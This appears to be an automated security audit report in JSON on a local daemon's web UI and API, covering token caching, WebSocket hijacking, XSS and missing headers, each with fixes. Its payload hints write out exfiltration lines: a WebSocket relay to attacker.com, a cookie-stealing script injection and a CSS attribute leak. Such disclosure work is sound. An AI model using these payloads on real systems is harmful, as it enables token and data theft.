{
  "task_id": "expl-website",
  "prompt_version": "phase23.exploration.v1",
  "completed_at_utc": "2026-05-21",
  "actions_used": 12,
  "findings": [
    {
      "path": "crates/nyctos-ui/src/lib.rs",
      "line": 109,
      "cap": "TOKEN_LEAK_VIA_CACHE",
      "rationale": "UiResponse::into_response sets only Content-Type — no Cache-Control, no Pragma, no Vary. The body served for index.html embeds the live bearer token via inject_bootstrap (line 79) as `<script>window.__NYCTOS_BOOTSTRAP__={\"authToken\":\"...\"};</script>`. By HTTP/1.1 default, a 200 response with no cache directives is heuristically cacheable by any compliant intermediary and by the browser disk cache. Worse, spa_handler_with (line 130) returns the *same* token-bearing index.html as the SPA fallback for *any* extensionless URL (resolve_with line 54), so a forced revisit through dev-tools history, a screenshot tool, or a profile-sync (Chrome / Edge cross-device cache sync) persists the bearer to disk under arbitrary URL keys. The token is then trivially recoverable by another local user, by malware reading the cache directory, or by anyone with read access to a synced backup. Fix: emit `Cache-Control: no-store, no-cache, must-revalidate, private` plus `Pragma: no-cache` on every index.html response (and on any other handler that emits the bootstrap), and ideally also set `Clear-Site-Data: \"cache\"` on logout. Static pass missed because the asset crate and the auth crate live in separate workspaces and the bearer is treated as 'just a string' once it crosses the crate boundary.",
      "endpoint": "<asset:GET /, GET /<any-extensionless-path>>",
      "suggested_payload_hint": "Curl any extensionless path twice with `-H 'Cache-Control: max-age=0'`; inspect ~/Library/Caches/<browser>/Cache after a SPA visit and grep for `__NYCTOS_BOOTSTRAP__` — token recoverable post-process-exit."
    },
    {
      "path": "crates/nyctos-api/src/router.rs",
      "line": 1581,
      "cap": "CSWSH",
      "rationale": "events_ws upgrade has no Origin header allowlist. Browsers DO NOT enforce same-origin policy on WebSocket handshakes — there is no preflight, and the upgrade proceeds based purely on whatever Origin the foreign page advertises. Authentication for the upgrade flows through the same auth_layer that already accepts `?token=<bearer>` (router.rs line 149 + frontend client.ts line 675 — useAgentEvents puts the token in the URL). Attack: a malicious page at attacker.com leaks the token by any of the prior-finding sinks (Referer, log scrape, intermediary cache, finding #1's query-token leak surface), then opens `new WebSocket('ws://127.0.0.1:<port>/api/v1/events?token=<leaked>')` — the daemon accepts the upgrade and pushes EVERY AgentEvent for every run on the box: ScanProgress with file paths, ToolCallStarted with arguments (often containing source excerpts, repo URLs, credentials inlined by the agent), AgentTraceRow with prompt+response previews. The earlier CORS_MISCONFIG finding (router.rs:96) covers the WRITE side via state-change POSTs; this is the READ side that exfiltrates the daemon's entire telemetry stream. Even without a leaked token, DNS rebinding (attacker.com → 127.0.0.1 after the cross-origin tab is open) lands the WS open without a token because `state.auth.is_enforced()` returns false on the --headless path that some setups use. Fix: in events_ws, extract the Origin header before the upgrade and reject any value that is not in the SPA's allowlist (typically `http://127.0.0.1:<port>` and `http://localhost:<port>` exactly). Defense in depth: require a CSRF-style one-shot nonce, minted by `/api/v1/events/ticket` and bound to the source IP, in place of the long-lived bearer for the WS handshake.",
      "endpoint": "<api:GET /api/v1/events (WebSocket upgrade)>",
      "suggested_payload_hint": "From attacker.com: `let ws = new WebSocket('ws://127.0.0.1:8765/api/v1/events?token=<leaked>'); ws.onmessage = e => fetch('https://attacker.com/x', {method:'POST', body:e.data});` — exfils every AgentEvent the daemon emits."
    },
    {
      "path": "crates/nyctos-ui/src/lib.rs",
      "line": 100,
      "cap": "XSS",
      "rationale": "serde_payload hand-rolls JSON encoding and escapes only the `\"` character. The comment claims `token is hex, so escaping is moot` but (a) nothing in the type system enforces hex — `UiBootstrap.auth_token` is `Option<String>` (line 32) and (b) the deferred backlog already discusses token-format changes (per docs/). Even with the current hex-formatted token, the helper happily inlines `</script>` substrings, `\\`, U+2028, U+2029, or any control char that a future token spec might include. The injected payload lands inside a literal `<script>` block (line 84: `<script>window.__NYCTOS_BOOTSTRAP__={...};</script>`), so a single `</script>` byte in the token closes the script tag and the remainder of the token (or any HTML that follows in the body) becomes parsed markup. Combined with the SPA-fallback behaviour (any extensionless path returns this index.html) AND the absence of CSP / X-Content-Type-Options / X-Frame-Options on the response (UiResponse::into_response line 109 sets only Content-Type), a single mutation of the token store turns into stored XSS executing with the live bearer in scope. Fix: use `serde_json::to_string` against a real serde struct so backslashes, control chars, and the `</` sequence are properly escaped to `\\u003c\\/script>`; the dependency cost is one line. Static pass missed because the sink is HTML injection masquerading as JSON serialization, with the safety argument living in a code comment rather than in the encoder.",
      "endpoint": "<asset:GET />",
      "suggested_payload_hint": "If `auth_token` is ever set to `\"abc</script><script>fetch('//x?'+document.cookie)</script>\"` (or to anything containing a literal `\\`), the next index.html load executes the attacker script. Demonstrates: set bootstrap.auth_token=`a</script><img src=x onerror=alert(1)>` in a unit test and assert the rendered HTML does NOT contain a literal `</script>` outside the bootstrap line."
    },
    {
      "path": "crates/nyctos-ui/src/lib.rs",
      "line": 110,
      "cap": "MISSING_SECURITY_HEADERS",
      "rationale": "UiResponse::into_response emits ONLY a Content-Type header. The daemon's SPA — which holds the bearer in window-scope JS and is also the privileged admin surface — is served with no Content-Security-Policy, no X-Frame-Options / frame-ancestors, no X-Content-Type-Options, no Referrer-Policy, and no Permissions-Policy. Concrete consequences: (1) No CSP means any first-party XSS sink (including the one in finding #3 above) or a malicious npm transitive dependency can fetch the token from `window.__NYCTOS_BOOTSTRAP__.authToken` and POST it to an external origin — there is no script-src or connect-src gate. (2) No X-Frame-Options means attacker.com can iframe `http://127.0.0.1:<port>/` and mount a clickjacking attack: invisible iframe at z-index 9999, victim 'clicks' on Delete Project / Scan Now / Promote Quarantine / Run Repro Bundle while believing they are interacting with the foreign-origin page; the iframe is same-origin to the daemon, so the SPA fires authenticated requests with the live bearer. (3) No Referrer-Policy means navigation away from the SPA leaks the full URL — combined with finding #1 (token in query), the bearer ships to every outbound link / image / iframe via Referer. (4) The index.html at line 11–15 deliberately preconnects to fonts.googleapis.com / fonts.gstatic.com and loads CSS from a third party, so a security-tool described as 'loopback-only' makes a guaranteed cross-origin call on every page load — DNS hijack of fonts.googleapis.com or compromise of Google's CSS pipeline yields CSS-injection on a privileged surface with full data-exfil via attribute-selector + background-image (e.g. `input[value^=\"sk-ant\"] { background: url(//attacker/leak?p=...) }`). Fix: add a `headers` HashMap to UiResponse with sensible defaults — `Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self'; connect-src 'self' ws://127.0.0.1:* http://127.0.0.1:*; frame-ancestors 'none'`, `X-Frame-Options: DENY`, `X-Content-Type-Options: nosniff`, `Referrer-Policy: no-referrer`, `Permissions-Policy: interest-cohort=()`, and self-host the Playfair Display font so the daemon truly stays loopback-only.",
      "endpoint": "<asset:GET /*>",
      "suggested_payload_hint": "Curl `-I http://127.0.0.1:<port>/` and assert the response contains Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Referrer-Policy. Also: build a clickjacking PoC that iframes the daemon and overlays a transparent 'click here for free coffee' button on top of the Delete Project confirm dialog."
    }
  ]
}
